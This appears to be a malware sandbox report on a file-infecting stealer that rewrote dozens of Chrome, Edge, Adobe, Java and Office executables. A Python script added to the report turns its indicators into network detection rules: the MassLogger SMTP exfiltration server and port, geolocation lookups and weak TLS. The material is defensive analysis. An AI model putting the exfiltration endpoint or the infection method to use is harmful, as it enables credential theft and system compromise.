Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49752 version: TLS 1.0
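The DNS query to reallyfreegeoip.org and the TLS 1.0 sessions recorded above, together with the SMTP exfiltration settings in the extracted MassLogger configuration, give three network-side tells that do not depend on the C2 domains of this particular sample. The block below is an added example, not from the report: it applies those tells to constructed Zeek-style records. The hostname, the 104.21.67.152:443 TLS 1.0 session and the server/port from the configuration are taken from the report; the answer addresses 203.0.113.82 and 198.51.100.7, the relay 10.0.0.25, the internal ranges, the extra geolocation hostnames and the field names are assumptions.

```python
import ipaddress

# Constructed Zeek-style records (field names are our own). The first four mirror what
# the report records: the DNS query for reallyfreegeoip.org, a TLS 1.0 session to
# 104.21.67.152:443, and SMTP submission to the server named in the extracted
# MassLogger configuration. The answer IPs 203.0.113.82 / 198.51.100.7 (TEST-NET
# ranges) and the last three records are placeholders and benign controls.
MASSLOGGER_CONFIG = {"EXfil Mode": "SMTP", "Server": "s82.gocheapweb.com", "Port": 587}
SAMPLE_RECORDS = [
    {"type": "dns", "src": "192.168.2.4", "query": "reallyfreegeoip.org", "answer": "104.21.67.152"},
    {"type": "ssl", "src": "192.168.2.4", "dst": "104.21.67.152", "dport": 443, "version": "TLSv10"},
    {"type": "dns", "src": "192.168.2.4", "query": "s82.gocheapweb.com", "answer": "203.0.113.82"},
    {"type": "conn", "src": "192.168.2.4", "dst": "203.0.113.82", "dport": 587, "proto": "tcp"},
    {"type": "dns", "src": "192.168.2.4", "query": "www.example.com", "answer": "198.51.100.7"},
    {"type": "ssl", "src": "192.168.2.4", "dst": "198.51.100.7", "dport": 443, "version": "TLSv13"},
    {"type": "conn", "src": "192.168.2.4", "dst": "10.0.0.25", "dport": 587, "proto": "tcp"},
]

# Assumptions behind the rules: the organisation's own mail relay and address space,
# IP-geolocation services that stealers query for the victim's country (only
# reallyfreegeoip.org is in the report), and TLS versions no current client sends.
INTERNAL_MAIL_RELAYS = {"10.0.0.25"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
GEOIP_HOSTS = {"reallyfreegeoip.org", "freegeoip.app", "ip-api.com", "ipinfo.io",
               "api.ipify.org", "checkip.dyndns.org"}
WEAK_TLS = {"SSLv3", "TLSv10", "TLSv11"}
MAIL_PORTS = {25, 465, 587}


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def config_iocs(cfg: dict):
    """(server, port) to hunt for from an extracted SMTP-exfil config, else None."""
    if str(cfg.get("EXfil Mode", "")).upper() != "SMTP":
        return None
    return cfg["Server"].lower(), int(cfg["Port"])


def triage(records, cfg: dict = None) -> list:
    """Return (rule, src, detail) tuples. DNS answers are remembered so that a later
    connection can be tied back to the name that was resolved for it."""
    ioc = config_iocs(cfg) if cfg else None
    resolved = {}
    findings = []
    for r in records:
        if r["type"] == "dns":
            name = r["query"].lower()
            resolved[r["answer"]] = name
            if name in GEOIP_HOSTS:
                findings.append(("geoip_lookup", r["src"], name))
            if ioc and name == ioc[0]:
                findings.append(("config_server_resolved", r["src"], name))
        elif r["type"] == "ssl" and r["version"] in WEAK_TLS:
            findings.append(("weak_tls", r["src"], f"{r['version']} to {r['dst']}:{r['dport']}"))
        elif r["type"] == "conn" and r["dport"] in MAIL_PORTS:
            if r["dst"] in INTERNAL_MAIL_RELAYS or is_internal(r["dst"]):
                continue  # mail to the organisation's own relay is expected
            name = resolved.get(r["dst"], "unresolved")
            rule = "config_exfil_server" if ioc and (name, r["dport"]) == ioc else "direct_smtp_external"
            findings.append((rule, r["src"], f"{r['dst']} ({name}):{r['dport']}"))
    return findings


if __name__ == "__main__":
    for rule, src, detail in triage(SAMPLE_RECORDS, MASSLOGGER_CONFIG):
        print(f"[{rule}] {src} -> {detail}")
```

Without a configuration the last rule still fires as direct_smtp_external: a workstation submitting mail straight to an external server on 587 is worth a look on its own, and SMTP exfiltration is how this sample delivers what it steals. With the extracted configuration supplied, the same connection is labelled config_exfil_server because the resolved name and port match the extracted server.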
PDB paths recovered from process memory. They belong to the host's own legitimate binaries (Adobe ARM, ALG, the Firefox maintenance service, Acrobat components, App-V, an updater) and appear inside x.exe and alg.exe, which is consistent with the infector reading each victim executable before rewriting it (see Spreading):

Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb | source: x.exe, 00000001.00000003.1727383425.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL | source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb | source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL | source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` | source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdbI | source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ | source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb | source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT | source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb | source: alg.exe, 00000003.00000003.2384907802.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb | source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) | source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb | source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb | source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb | source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdb | source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb | source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL | source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp

Spreading

Every file below is a legitimate Windows or third-party executable on the analysis host that was rewritten by an already-infected process. alg.exe, armsvc.exe, elevation_service.exe and maintenanceservice.exe are service binaries, which is why they appear at the top level of the process tree with no parent and why the infection re-executes without any user action, and why infected copies of snmptrap.exe, Spectrum.exe and Locator.exe later run from System32. W32/Infector.Gen hits on this many vendor binaries mean the Program Files and System32 trees can no longer be trusted: compare hashes against a clean install (or re-check Authenticode signatures where the vendor signs its binaries) to scope the damage, then rebuild from known-good media rather than cleaning files one by one.

Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | System file written: C:\Windows\System32\snmptrap.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | System file written: C:\Windows\System32\Spectrum.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0046445A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C6D1 FindFirstFileW,FindClose,1_2_0046C6D1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0046C75C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046EF95
